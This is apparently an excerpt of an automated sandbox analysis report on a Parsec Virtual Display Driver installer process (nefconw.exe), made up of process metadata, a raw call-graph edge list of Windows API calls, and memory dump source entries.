                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:74
                              Start time:21:12:17
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              Wow64 process (32bit):false
                              Commandline:.\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"
                              Imagebase:0x7ff6750a0000
                              File size:588'160 bytes
                              MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true


                                Execution Graph

                                Execution Coverage:8.5%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:13.6%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:43
                                execution_graph: node and edge data of the interactive call-graph view (rendered graphically in the original report; not reproducible as text)
33513 413352 memmove 33512->33513 33514 413315 33512->33514 33513->32239 33515 413357 _CxxThrowException 33514->33515 33516 41334b 33514->33516 33518 4131d8 malloc _CxxThrowException memmove free 33516->33518 33518->33513 33519 46e286 33520 46e29d __set_app_type 33519->33520 33521 46e2e1 33520->33521 33522 46e2f7 _initterm __getmainargs _initterm 33521->33522 33523 46e2ea __setusermatherr 33521->33523 33524 46e371 33522->33524 33523->33522 33525 46e383 33524->33525 33526 46e37b _cexit 33524->33526 33526->33525 33527 41eae0 33528 41eafd 33527->33528 33530 41eaf3 33527->33530 33528->33530 33533 4196f8 33528->33533 33532 41eb63 GetLastError 33532->33530 33534 419720 SetFilePointer 33533->33534 33535 41970d 33533->33535 33536 419743 GetLastError 33534->33536 33537 419766 33534->33537 33535->33534 33536->33537 33538 41974f 33536->33538 33537->33530 33537->33532 33541 41969c SetFilePointer GetLastError 33538->33541 33540 41975a SetLastError 33540->33537 33541->33540 33542 41f3a0 33543 41f3c1 33542->33543 33544 41f3b2 33542->33544 33547 41e8c4 33544->33547 33550 46d8a0 VirtualFree 33547->33550 33549 41e919 33550->33549 33551 423760 33605 411648 33551->33605 33554 4237ca _isatty _isatty _isatty 33556 42381d 33554->33556 33563 423892 33556->33563 33627 422c88 9 API calls 33556->33627 33557 4237b8 _CxxThrowException 33557->33554 33559 42387a 33628 412ecc 33559->33628 33561 423887 free 33561->33563 33562 423934 33620 41bd0c GetCurrentProcess OpenProcessToken 33562->33620 33563->33562 33633 4386a8 7 API calls 33563->33633 33566 41bd0c 6 API calls 33568 4239c7 33566->33568 33570 423a72 33568->33570 33572 4239f2 33568->33572 33573 4239f9 wcscmp 33568->33573 33569 423969 _CxxThrowException 33569->33562 33571 423b97 33570->33571 33575 412db8 2 API calls 33570->33575 33635 41bda4 GetModuleHandleW GetProcAddress 33572->33635 33573->33572 33574 423a0e 33573->33574 33574->33572 33579 423a23 33574->33579 33577 423aa0 33575->33577 33637 412f28 malloc _CxxThrowException free 33577->33637 
33578 423a55 33578->33570 33636 46d8c0 GetModuleHandleW GetProcAddress 33578->33636 33634 4386a8 7 API calls 33579->33634 33582 423aae 33638 4139f0 malloc _CxxThrowException memmove free _CxxThrowException 33582->33638 33584 423a37 _CxxThrowException 33584->33572 33586 423a5e 33587 41bd0c 6 API calls 33586->33587 33588 423a6c 33587->33588 33588->33570 33589 423abd 33590 423b19 33589->33590 33639 4386a8 7 API calls 33589->33639 33640 4139f0 malloc _CxxThrowException memmove free _CxxThrowException 33590->33640 33592 423b07 _CxxThrowException 33592->33590 33594 423b33 GetCurrentProcess SetProcessAffinityMask 33595 423b84 33594->33595 33596 423b4a GetLastError 33594->33596 33643 413920 _CxxThrowException 33595->33643 33641 4139f0 malloc _CxxThrowException memmove free _CxxThrowException 33596->33641 33599 423b61 33642 416d34 10 API calls 33599->33642 33600 423b8c free 33600->33571 33602 423b6d 33603 4139ac 6 API calls 33602->33603 33604 423b79 free 33603->33604 33604->33595 33606 4116cb 33605->33606 33607 41169f 33605->33607 33608 411701 33606->33608 33611 4116f9 free 33606->33611 33607->33606 33609 4116b7 free free 33607->33609 33610 412350 2 API calls 33608->33610 33609->33607 33617 411719 33610->33617 33611->33608 33612 411805 33612->33554 33626 4386a8 7 API calls 33612->33626 33613 455a44 5 API calls 33613->33617 33614 412350 2 API calls 33614->33617 33615 4136a8 3 API calls 33615->33617 33617->33612 33617->33613 33617->33614 33617->33615 33618 411807 33617->33618 33644 41138c 9 API calls 33617->33644 33619 413798 4 API calls 33618->33619 33619->33612 33621 41bd37 LookupPrivilegeValueW 33620->33621 33622 41bd98 33620->33622 33623 41bd4b AdjustTokenPrivileges 33621->33623 33624 41bd8d CloseHandle 33621->33624 33622->33566 33623->33624 33625 41bd82 GetLastError 33623->33625 33624->33622 33625->33624 33626->33557 33627->33559 33629 412ee0 33628->33629 33631 412f02 33628->33631 33630 412350 2 API calls 33629->33630 33629->33631 33632 412ef1 free 33630->33632 
33631->33561 33631->33631 33632->33631 33633->33569 33634->33584 33635->33578 33636->33586 33637->33582 33638->33589 33639->33592 33640->33594 33641->33599 33642->33602 33643->33600 33644->33617 33645 41ef28 33650 419900 33645->33650 33648 41ef58 GetLastError 33649 41ef65 33648->33649 33652 41991c 33650->33652 33653 41994f 33652->33653 33654 4198b8 WriteFile 33652->33654 33653->33648 33653->33649 33654->33652 33655 428a08 33656 428a2c 33655->33656 33659 428a6d 33655->33659 33692 44b2cc 33656->33692 33667 428830 33659->33667 33660 428b99 33661 44b2cc VariantClear 33660->33661 33662 428bb9 33660->33662 33661->33662 33665 428a46 33662->33665 33688 427b1c 33662->33688 33663 428ad3 33663->33660 33663->33665 33666 428b6a SetFileSecurityW 33663->33666 33666->33660 33668 41354c 2 API calls 33667->33668 33669 42886f 33668->33669 33671 4288d4 33669->33671 33673 42889b 33669->33673 33681 4288d0 33669->33681 33729 426e88 14 API calls 33671->33729 33727 4264e8 25 API calls 33673->33727 33675 42893d 33677 4289d2 free 33675->33677 33676 4288b3 33676->33681 33728 426e88 14 API calls 33676->33728 33677->33663 33680 42895b 33730 417474 56 API calls 33680->33730 33702 427924 33681->33702 33683 428967 33684 428981 33683->33684 33731 426e88 14 API calls 33683->33731 33687 428985 33684->33687 33732 4282c8 218 API calls 33684->33732 33687->33675 33687->33677 33689 427b76 33688->33689 33690 427b2c 33688->33690 33689->33665 33690->33689 33748 426e88 14 API calls 33690->33748 33693 44b319 33692->33693 33694 44b385 33693->33694 33697 44b32a 33693->33697 33701 44b31f 33693->33701 33695 41be6c VariantClear 33694->33695 33699 44b34b 33695->33699 33696 44b34f 33700 41be6c VariantClear 33696->33700 33697->33696 33697->33701 33698 41be6c VariantClear 33698->33699 33699->33665 33700->33699 33701->33698 33703 427949 33702->33703 33718 427942 33702->33718 33707 42798e 33703->33707 33739 4199cc 33703->33739 33706 4279d2 33709 413504 4 API calls 33706->33709 33710 427a4d 33706->33710 33707->33706 
33707->33710 33745 425f8c 6 API calls 33707->33745 33712 4279ee 33709->33712 33711 427aa8 33710->33711 33733 419878 SetFileTime 33710->33733 33734 41eee4 33711->33734 33746 41a030 48 API calls 33712->33746 33717 427a0f 33719 427a13 33717->33719 33720 427a1f 33717->33720 33718->33675 33718->33680 33721 41960c CloseHandle 33719->33721 33747 419960 WriteFile 33720->33747 33723 427a1d free 33721->33723 33723->33710 33724 427a37 33726 41960c CloseHandle 33724->33726 33726->33723 33727->33676 33728->33681 33729->33681 33730->33683 33731->33684 33732->33687 33733->33711 33735 41960c CloseHandle 33734->33735 33736 41eef3 33735->33736 33737 41eef9 GetLastError 33736->33737 33738 41ef06 33736->33738 33737->33738 33738->33718 33740 4196f8 5 API calls 33739->33740 33741 4199e7 33740->33741 33742 4199f4 33741->33742 33743 4199f8 SetEndOfFile 33741->33743 33742->33707 33744 426e88 14 API calls 33742->33744 33743->33742 33744->33707 33745->33706 33746->33717 33747->33724 33748->33689 33749 44d9ee 33751 44d9f4 33749->33751 33788 415110 33751->33788 33753 41354c 2 API calls 33755 44daa4 33753->33755 33754 44dad4 33757 412350 2 API calls 33754->33757 33758 44db1a 33754->33758 33755->33754 33756 413730 4 API calls 33755->33756 33756->33754 33757->33758 33792 438ad8 33758->33792 33760 44e4ac 33761 412350 2 API calls 33760->33761 33783 44e4da 33760->33783 33761->33783 33762 44e9e4 free free free free 33766 45182e free 33762->33766 33763 44db98 33763->33760 33765 44e48a free free free 33763->33765 33765->33766 33767 4523f7 33766->33767 33769 44e9f0 free free free free 33769->33766 33770 44ea46 free free free free 33770->33766 33771 44ea1b free free free free 33771->33766 33773 44ea85 free free free free 33773->33766 33776 44eaca free free free free 33776->33766 33778 44eb4e free free free free 33778->33766 33780 413798 malloc _CxxThrowException free memmove 33780->33783 33781 44eb90 free free free free 33781->33766 33783->33762 33783->33769 33783->33770 33783->33771 33783->33773 
33783->33776 33783->33778 33783->33780 33783->33781 33785 44ebcf free free free free 33783->33785 33786 44eb09 free free free free 33783->33786 33801 44c940 33783->33801 33805 44a408 6 API calls 33783->33805 33785->33766 33786->33766 33789 41512d 33788->33789 33790 4135b8 3 API calls 33789->33790 33791 415140 33790->33791 33791->33753 33793 438b54 33792->33793 33794 438aeb 33792->33794 33793->33763 33795 438af4 _CxxThrowException 33794->33795 33796 438b0e 33794->33796 33795->33796 33797 412350 2 API calls 33796->33797 33798 438b2a 33797->33798 33799 438b33 memmove 33798->33799 33800 438b46 free 33798->33800 33799->33800 33800->33793 33804 44c968 33801->33804 33802 44c978 33802->33783 33804->33802 33806 454c98 19 API calls 33804->33806 33805->33783 33806->33802 33807 42b64c 33808 42b689 33807->33808 33850 42649c 33808->33850 33811 42b7da 33814 42b7fd 33811->33814 33815 42b7e9 33811->33815 33812 42b7c9 33813 41be6c VariantClear 33812->33813 33849 42b7d3 33813->33849 33816 41be6c VariantClear 33814->33816 33817 41be6c VariantClear 33815->33817 33818 42b817 33816->33818 33817->33849 33884 42a24c 33818->33884 33823 44b2cc VariantClear 33825 42b862 33823->33825 33824 42b89d 33827 42b8bd 33824->33827 33841 42b908 33824->33841 33824->33849 33825->33824 33825->33849 34067 42a024 29 API calls 33825->34067 33830 42b8fb 33827->33830 34068 428db8 free free memmove 33827->34068 33828 42bab6 33834 412350 2 API calls 33828->33834 33842 42bac9 33828->33842 33830->33828 33832 42bbed 33830->33832 33836 42bc14 33832->33836 33837 42bc58 33832->33837 33832->33849 33834->33842 33835 42b938 33835->33849 34070 428db8 free free memmove 33835->34070 33838 412350 2 API calls 33836->33838 33939 42ac94 33837->33939 33838->33849 33840 42bba0 free 33840->33849 33841->33835 33841->33849 34069 414ee4 CharUpperW CharUpperW 33841->34069 34071 43efc0 33842->34071 33845 42bb74 33848 4139ac 6 API calls 33845->33848 33848->33840 33853 4264ac 33850->33853 33851 44d50a 33852 44a074 VariantClear 
33851->33852 33854 44d52f 33852->33854 33853->33851 33855 44d4f3 free free 33853->33855 33856 42b795 33854->33856 34078 44c8e4 15 API calls 33854->34078 33855->33853 33856->33811 33856->33812 33856->33849 33858 44d54f 33858->33856 33859 413798 4 API calls 33858->33859 33860 44d563 33859->33860 33861 44a074 VariantClear 33860->33861 33872 44d580 33860->33872 33861->33872 33862 44d6c1 33867 413730 4 API calls 33862->33867 33868 44d6ff 33862->33868 33863 44d731 34081 44d19c 21 API calls 33863->34081 33864 44d7fb 34082 415a4c 11 API calls 33864->34082 33867->33868 33868->33863 33868->33864 33869 44d614 33871 41be6c VariantClear 33869->33871 33870 44d637 33870->33869 33875 44d65a 33870->33875 34080 44c8e4 15 API calls 33870->34080 33871->33856 33872->33856 33872->33862 33872->33869 33872->33870 34079 413850 malloc _CxxThrowException SysStringLen free 33872->34079 33873 44d743 33873->33856 33877 413730 4 API calls 33873->33877 33880 44d794 33873->33880 33881 41be6c VariantClear 33875->33881 33877->33880 33878 44d7e5 free free 33878->33856 33879 44d67f 33879->33869 33882 44a074 VariantClear 33879->33882 33880->33856 33880->33878 33881->33862 33883 44d6a0 33882->33883 33883->33869 33883->33875 33885 42a2c9 33884->33885 33886 42a2d0 33885->33886 33887 42a2fe 33885->33887 33888 42a2dd 33885->33888 33890 41be6c VariantClear 33886->33890 33887->33886 33889 42a2fc 33887->33889 34083 413850 malloc _CxxThrowException SysStringLen free 33888->34083 33893 41be6c VariantClear 33889->33893 33892 42a313 33890->33892 33892->33849 33935 44a074 33892->33935 33894 42a324 33893->33894 33895 42a352 33894->33895 33896 42a380 33894->33896 33897 42a35f 33894->33897 33898 41be6c VariantClear 33895->33898 33896->33895 33900 42a37e 33896->33900 34084 413850 malloc _CxxThrowException SysStringLen free 33897->34084 33898->33892 33901 41be6c VariantClear 33900->33901 33902 42a3a6 33901->33902 33902->33892 33903 42a544 33902->33903 33904 41354c 2 API calls 33902->33904 33903->33892 33909 42a599 
33903->33909 34087 413cb8 memmove 33903->34087 33906 42a456 33904->33906 33907 41354c 2 API calls 33906->33907 33908 42a461 33907->33908 33911 412db8 2 API calls 33908->33911 33914 42a5d0 33909->33914 34088 413cb8 memmove 33909->34088 33912 42a46f 33911->33912 34085 41a0bc 6 API calls 33912->34085 33914->33892 34089 415a4c 11 API calls 33914->34089 33915 42a48a 33917 42a523 free free free 33915->33917 34086 41a2b4 13 API calls 33915->34086 33917->33903 33919 42a65b 34091 428db8 free free memmove 33919->34091 33921 42a4a9 33923 413798 4 API calls 33921->33923 33922 42a66b 33925 43efc0 7 API calls 33922->33925 33926 42a4b9 free 33923->33926 33928 42a67a 33925->33928 33929 42a4df 33926->33929 33927 42a61a 33927->33919 33927->33922 34090 414ee4 CharUpperW CharUpperW 33927->34090 33930 413798 4 API calls 33928->33930 33929->33917 33931 42a68a free 33930->33931 33932 42a6d1 free 33931->33932 33933 42a6a3 33931->33933 33932->33892 33933->33932 33934 42a6bc free free 33933->33934 33934->33933 33936 44a0a4 33935->33936 33937 41be6c VariantClear 33936->33937 33938 42b840 33937->33938 33938->33823 33938->33849 34092 4270a4 33939->34092 33942 42b576 33942->33849 33943 44a074 VariantClear 33944 42acf8 33943->33944 33944->33942 34110 42a7e4 33944->34110 33947 43efc0 7 API calls 33948 42ad19 33947->33948 33949 42ad2b 33948->33949 34226 42a9fc 131 API calls 33948->34226 33951 4136a8 3 API calls 33949->33951 33952 42ad3a 33951->33952 33956 42ad7e 33952->33956 34227 426330 7 API calls 33952->34227 33954 42ad65 33955 413798 4 API calls 33954->33955 33957 42ad73 free 33955->33957 33958 42ae93 33956->33958 33961 41354c 2 API calls 33956->33961 33957->33956 33959 42aef3 33958->33959 33960 42ae9b 33958->33960 33962 42af35 33959->33962 34138 42728c 33959->34138 33963 413798 4 API calls 33960->33963 33982 42adae free 33961->33982 33965 413798 4 API calls 33962->33965 33964 42aeac 33963->33964 33967 42aec5 33964->33967 34230 417088 48 API calls 33964->34230 33968 42af4a 33965->33968 
33967->33962 33971 42aed5 33967->33971 33972 42af53 free 33968->33972 33973 42af66 33968->33973 33979 42aee3 free 33971->33979 33985 427b1c 14 API calls 33971->33985 33980 42b56a free 33972->33980 33981 42af6e 33973->33981 33991 42afd9 33973->33991 33974 42af20 33974->33962 33977 42af25 free 33974->33977 33975 42af0e free 33975->33980 33977->33980 33978 42ae0c 33984 413798 4 API calls 33978->33984 33979->33980 33980->33942 34231 4282c8 218 API calls 33981->34231 33982->33958 33982->33978 33983 42b0aa 33988 412350 2 API calls 33983->33988 33987 42ae27 33984->33987 33989 42aee2 33985->33989 33992 42ae3d 33987->33992 34228 4132b0 _CxxThrowException 33987->34228 34003 42b12a 33988->34003 33989->33979 33990 42af91 33993 42af97 free 33990->33993 33994 42afa9 33990->33994 33991->33983 34232 4260f4 VariantClear _CxxThrowException _CxxThrowException 33991->34232 33997 4136a8 3 API calls 33992->33997 33993->33980 33998 42afc6 free 33994->33998 34001 427b1c 14 API calls 33994->34001 34000 42ae6e 33997->34000 33998->33980 33999 42b015 34002 42b01b free 33999->34002 34021 42b02d 33999->34021 34229 43edf0 malloc _CxxThrowException free 34000->34229 34001->33998 34002->33980 34220 41a008 34003->34220 34005 42ae79 34007 4139ac 6 API calls 34005->34007 34009 42ae88 free 34007->34009 34009->33958 34010 42b196 34236 426e88 14 API calls 34010->34236 34012 42b1aa 34016 42b1b0 free 34012->34016 34017 42b1d1 free 34012->34017 34013 42b0ac 34233 417258 50 API calls 34013->34233 34014 42b09d 34018 413798 4 API calls 34014->34018 34015 42b40e 34020 42b4cd 34015->34020 34029 4136a8 3 API calls 34015->34029 34016->33980 34017->33980 34018->33983 34026 42b2a4 free 34020->34026 34038 42b4ee free 34020->34038 34021->33983 34021->34013 34021->34014 34022 42b1f0 34030 42b234 34022->34030 34031 42b33b 34022->34031 34025 42b0b9 34027 42b105 34025->34027 34028 42b0bd 34025->34028 34026->33980 34032 427b1c 14 API calls 34027->34032 34234 4195e0 GetLastError 34028->34234 34044 42b43a 34029->34044 34041 
42b26c free 34030->34041 34049 42b278 34030->34049 34060 42b28c 34030->34060 34031->34015 34033 4199cc 6 API calls 34031->34033 34036 42b10d free 34032->34036 34037 42b37d 34033->34037 34035 42b0c2 34235 426f80 13 API calls 34035->34235 34036->33980 34040 42b3bf 34037->34040 34237 426e88 14 API calls 34037->34237 34038->33980 34223 419784 34040->34223 34041->34049 34043 412350 2 API calls 34043->34026 34047 42b49c 34044->34047 34239 427e80 7 API calls 34044->34239 34046 42b0dd 34054 42b0e3 free 34046->34054 34055 42b0f5 free 34046->34055 34051 42b4c3 free 34047->34051 34058 413798 4 API calls 34047->34058 34053 412350 2 API calls 34049->34053 34049->34060 34051->34020 34052 42b398 34052->34040 34059 42b39e free 34052->34059 34053->34060 34054->33980 34055->33980 34062 42b4c2 34058->34062 34059->33980 34060->34043 34062->34051 34064 42b3e7 34064->34015 34065 42b3ed free 34064->34065 34065->33980 34067->33824 34068->33830 34069->33841 34070->33830 34072 41354c 2 API calls 34071->34072 34074 43efe9 34072->34074 34073 42bb42 34073->33840 34073->33845 34077 4132b0 _CxxThrowException 34073->34077 34074->34073 34075 4139ac 6 API calls 34074->34075 34271 4132b0 _CxxThrowException 34074->34271 34075->34074 34078->33858 34080->33879 34081->33873 34082->33856 34085->33915 34086->33921 34087->33909 34088->33909 34089->33927 34090->33927 34091->33922 34093 4270fb 34092->34093 34094 42710e 34093->34094 34095 427101 34093->34095 34097 41be6c VariantClear 34094->34097 34096 41be6c VariantClear 34095->34096 34098 42716a 34096->34098 34100 42717b 34097->34100 34098->33942 34098->33943 34099 4271af 34102 41be6c VariantClear 34099->34102 34100->34099 34101 4271bc 34100->34101 34103 41be6c VariantClear 34101->34103 34102->34098 34104 4271f1 34103->34104 34240 426d18 VariantClear 34104->34240 34106 427208 34106->34098 34241 426d18 VariantClear 34106->34241 34108 427223 34108->34098 34242 426d18 VariantClear 34108->34242 34111 42a802 34110->34111 34113 42a834 34111->34113 34243 43f078 17 
API calls 34111->34243 34114 42a98c 34113->34114 34115 4136a8 3 API calls 34113->34115 34114->33947 34116 42a852 34115->34116 34244 43edf0 malloc _CxxThrowException free 34116->34244 34118 42a85d 34119 42a8c3 34118->34119 34120 42a86a 34118->34120 34132 42a890 34119->34132 34245 41553c wcscmp 34119->34245 34121 455a44 5 API calls 34120->34121 34124 42a876 34121->34124 34122 42a957 34126 4139ac 6 API calls 34122->34126 34127 412350 2 API calls 34124->34127 34125 42a8d5 34131 455a44 5 API calls 34125->34131 34125->34132 34129 42a981 free 34126->34129 34130 42a87e 34127->34130 34129->34114 34130->34132 34134 41354c 2 API calls 34130->34134 34133 42a8e5 34131->34133 34132->34122 34246 4132b0 _CxxThrowException 34132->34246 34135 412350 2 API calls 34133->34135 34134->34132 34136 42a8ef 34135->34136 34136->34132 34137 41354c 2 API calls 34136->34137 34137->34132 34139 4272bd 34138->34139 34140 41354c 2 API calls 34139->34140 34141 4272ca 34140->34141 34142 4188ec 102 API calls 34141->34142 34143 4272db 34142->34143 34149 4275f9 34143->34149 34150 4272e5 34143->34150 34144 4272eb 34145 4275e5 free 34144->34145 34147 4276b5 34145->34147 34146 42744b 34151 427490 34146->34151 34152 427451 34146->34152 34147->33974 34147->33975 34148 4276a3 free 34148->34147 34149->34148 34156 4136a8 3 API calls 34149->34156 34150->34144 34150->34146 34258 425f40 malloc _CxxThrowException memmove 34150->34258 34153 427562 34151->34153 34154 42749a 34151->34154 34259 41e70c 106 API calls 34152->34259 34159 427570 34153->34159 34160 42759c 34153->34160 34158 4136a8 3 API calls 34154->34158 34179 427629 34156->34179 34164 4274a7 34158->34164 34266 417088 48 API calls 34159->34266 34268 419164 103 API calls 34160->34268 34161 427459 34166 427484 34161->34166 34167 42745d 34161->34167 34163 427312 34170 4134d0 4 API calls 34163->34170 34261 41e70c 106 API calls 34164->34261 34166->34148 34260 426e00 7 API calls 34167->34260 34169 4275a4 34169->34148 34173 4275ac 34169->34173 34174 427328 free 
34170->34174 34172 427578 34172->34148 34176 427580 34172->34176 34269 417474 56 API calls 34173->34269 34185 4273a7 34174->34185 34175 4274b2 34180 4274b6 34175->34180 34181 4274f5 34175->34181 34267 426e88 14 API calls 34176->34267 34184 41354c 2 API calls 34179->34184 34262 426e00 7 API calls 34180->34262 34263 417130 50 API calls 34181->34263 34183 4275b4 34183->34148 34188 4275bc GetLastError 34183->34188 34189 427657 34184->34189 34190 4273c1 34185->34190 34191 4273ae free 34185->34191 34187 427502 34193 427553 free 34187->34193 34194 427506 34187->34194 34188->34148 34195 4275cb 34188->34195 34196 4188ec 102 API calls 34189->34196 34199 427441 free 34190->34199 34200 42740a 34190->34200 34204 4273d4 34190->34204 34205 42742a free 34190->34205 34191->34145 34192 4274c8 34197 4274e0 free 34192->34197 34198 4274ce free 34192->34198 34193->34148 34264 4195e0 GetLastError 34194->34264 34270 426e88 14 API calls 34195->34270 34203 42766d 34196->34203 34197->34145 34198->34145 34199->34146 34200->34199 34208 42768b free free 34203->34208 34247 416fcc 34203->34247 34209 427413 free 34204->34209 34210 4273d8 34204->34210 34205->34145 34206 42750b 34265 426f80 13 API calls 34206->34265 34207 4275dd 34207->34145 34208->34148 34209->34145 34210->34200 34213 4273dc 34210->34213 34216 4273e0 free 34213->34216 34217 4273f5 free 34213->34217 34214 427526 34218 42753e free 34214->34218 34219 42752c free 34214->34219 34216->34145 34217->34145 34218->34145 34219->34145 34221 419a94 48 API calls 34220->34221 34222 41a02a 34221->34222 34222->34010 34222->34022 34224 4196f8 5 API calls 34223->34224 34225 4197a0 34224->34225 34225->34015 34238 426e88 14 API calls 34225->34238 34226->33949 34227->33954 34229->34005 34230->33967 34231->33990 34232->33999 34233->34025 34234->34035 34235->34046 34236->34012 34237->34052 34238->34064 34239->34047 34240->34106 34241->34108 34242->34098 34243->34113 34244->34118 34245->34125 34248 416fe7 34247->34248 34249 417001 34248->34249 34250 416fee 
SetFileAttributesW 34248->34250 34251 416ffd 34249->34251 34252 41354c 2 API calls 34249->34252 34250->34249 34250->34251 34251->34208 34253 41700f 34252->34253 34254 41b8b0 44 API calls 34253->34254 34255 417024 34254->34255 34256 417048 free 34255->34256 34257 417028 SetFileAttributesW free 34255->34257 34256->34251 34257->34251 34258->34163 34259->34161 34260->34144 34261->34175 34262->34192 34263->34187 34264->34206 34265->34214 34266->34172 34267->34144 34268->34169 34269->34183 34270->34207 34272 453616 34273 45362c 34272->34273 34363 43c944 34273->34363 34276 413798 4 API calls 34277 4536e4 34276->34277 34278 453725 34277->34278 34279 453953 34277->34279 34280 453a40 free free 34278->34280 34281 45372d 34278->34281 34282 413798 4 API calls 34279->34282 34284 43ca94 7 API calls 34280->34284 34366 44b3b4 34281->34366 34283 4539b6 34282->34283 34286 413798 4 API calls 34283->34286 34303 453894 34284->34303 34288 4539c7 34286->34288 34292 413798 4 API calls 34288->34292 34289 453aa3 free free 34291 43ca94 7 API calls 34289->34291 34290 453749 34293 455a44 5 API calls 34290->34293 34291->34303 34294 4539d8 free free 34292->34294 34295 453751 34293->34295 34296 43ca94 7 API calls 34294->34296 34297 412350 2 API calls 34295->34297 34296->34303 34298 45375b 34297->34298 34299 453775 free free 34298->34299 34375 44b8e4 malloc _CxxThrowException memmove 34298->34375 34372 43ca94 7 API calls 34299->34372 34306 453395 34307 4533b9 memmove 34306->34307 34308 45339a memmove 34306->34308 34307->34303 34309 4533dd memmove 34307->34309 34308->34309 34310 4533fd 34309->34310 34336 44aec4 34310->34336 34313 413798 4 API calls 34314 453427 34313->34314 34315 413798 4 API calls 34314->34315 34316 453438 34315->34316 34351 452a28 34316->34351 34318 453453 34319 45345d 34318->34319 34320 4537f8 34318->34320 34322 455a44 5 API calls 34319->34322 34321 453886 34320->34321 34323 413798 4 API calls 34320->34323 34325 43ca94 7 API calls 34321->34325 34324 453465 34322->34324 34326 
453864 34323->34326 34327 412350 2 API calls 34324->34327 34325->34303 34328 413798 4 API calls 34326->34328 34329 45346f 34327->34329 34330 453875 34328->34330 34331 453489 34329->34331 34374 44b8e4 malloc _CxxThrowException memmove 34329->34374 34332 413798 4 API calls 34330->34332 34334 43ca94 7 API calls 34331->34334 34332->34321 34335 4534ae 34334->34335 34337 41354c 2 API calls 34336->34337 34338 44af12 34337->34338 34339 41354c 2 API calls 34338->34339 34340 44af1c 34339->34340 34341 41354c 2 API calls 34340->34341 34342 44af26 34341->34342 34343 41354c 2 API calls 34342->34343 34344 44af6e 34343->34344 34345 41354c 2 API calls 34344->34345 34346 44af78 34345->34346 34347 41354c 2 API calls 34346->34347 34348 44afae 34347->34348 34349 41354c 2 API calls 34348->34349 34350 44afb8 34349->34350 34350->34313 34352 452a55 34351->34352 34353 452a8f 34351->34353 34354 412350 2 API calls 34352->34354 34355 412350 2 API calls 34353->34355 34362 452a5d 34353->34362 34354->34362 34356 452aa0 34355->34356 34357 413798 4 API calls 34356->34357 34358 452adb 34357->34358 34359 419fc4 64 API calls 34358->34359 34360 452af0 34359->34360 34360->34362 34376 4195e0 GetLastError 34360->34376 34362->34318 34364 41354c 2 API calls 34363->34364 34365 43c9c3 memmove 34364->34365 34365->34276 34367 44b419 34366->34367 34370 41bf00 VariantClear 34367->34370 34371 44b41f 34367->34371 34368 41be6c VariantClear 34369 44b4ea 34368->34369 34369->34289 34369->34290 34370->34371 34371->34368 34373 43cafe memmove 34372->34373 34373->34306 34374->34331 34375->34299 34376->34362 34377 46ae51 34378 46aef6 34377->34378 34381 45fdd4 SetConsoleCtrlHandler 34378->34381 34382 452732 34383 45295a 34382->34383 34384 45273e 34382->34384 34384->34383 34420 44a110 VariantClear 34384->34420 34386 4527a4 34386->34383 34421 44a110 VariantClear 34386->34421 34388 4527be 34388->34383 34422 44a110 VariantClear 34388->34422 34390 4527d8 34390->34383 34423 44a110 VariantClear 34390->34423 34392 4527f2 
34392->34383 34424 44a110 VariantClear 34392->34424 34394 45280c 34394->34383 34425 44a110 VariantClear 34394->34425 34396 452826 34396->34383 34397 415110 3 API calls 34396->34397 34398 45283d 34397->34398 34399 41354c 2 API calls 34398->34399 34401 452848 34399->34401 34400 452872 34403 452945 free free 34400->34403 34404 4528a0 34400->34404 34405 4528fc 34400->34405 34401->34400 34402 413730 4 API calls 34401->34402 34402->34400 34403->34383 34407 41354c 2 API calls 34404->34407 34427 447e60 CharUpperW CharUpperW 34405->34427 34409 4528aa 34407->34409 34408 452909 34428 4383c4 10 API calls 34408->34428 34411 41354c 2 API calls 34409->34411 34413 4528b7 34411->34413 34412 45292d 34415 413798 4 API calls 34412->34415 34426 4383c4 10 API calls 34413->34426 34417 452939 free 34415->34417 34416 4528cd 34418 413798 4 API calls 34416->34418 34417->34403 34419 4528d9 free free free 34418->34419 34419->34403 34420->34386 34421->34388 34422->34390 34423->34392 34424->34394 34425->34396 34426->34416 34427->34408 34428->34412 34429 453d32 34451 452e58 34429->34451 34431 41354c 2 API calls 34433 453d66 34431->34433 34432 453d3a 34432->34431 34434 41354c 2 API calls 34433->34434 34435 453d71 34434->34435 34439 453dc5 34435->34439 34458 41768c 34435->34458 34441 453df2 free free 34439->34441 34448 453e0d 34439->34448 34443 453ebf 34441->34443 34442 453daa free free 34442->34443 34444 453ea7 free free 34444->34443 34445 4134d0 4 API calls 34445->34448 34446 455a44 5 API calls 34446->34448 34447 412350 2 API calls 34447->34448 34448->34444 34448->34445 34448->34446 34448->34447 34449 4136a8 3 API calls 34448->34449 34450 453e71 free 34448->34450 34449->34448 34450->34448 34452 41354c 2 API calls 34451->34452 34453 452edc 34452->34453 34454 41354c 2 API calls 34453->34454 34455 452ee9 34454->34455 34456 41354c 2 API calls 34455->34456 34457 452f02 34456->34457 34457->34432 34459 4176a5 34458->34459 34460 4176b7 34459->34460 34461 413730 4 API calls 34459->34461 34462 413730 4 API 
                                [Control-flow graph edge list (continuation of the graph rendered above); the image itself is not recoverable as text. API calls visible on the graph nodes: free, FreeLibrary, EnterCriticalSection, LeaveCriticalSection, GetTickCount, strcmp, wcscmp, strlen, _CxxThrowException, malloc, memmove, memset, fflush, fputs, fputc, GetLastError, VirtualAlloc, ReadFile, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, CloseHandle, CharUpperW]
                                APIs
                                • fputs.MSVCRT ref: 00468815
                                  • Part of subcall function 004124C4: fputc.MSVCRT ref: 004124D5
                                • GetStdHandle.KERNEL32 ref: 004688BE
                                • GetConsoleScreenBufferInfo.KERNELBASE ref: 004688CF
                                • _CxxThrowException.MSVCRT ref: 00468A08
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
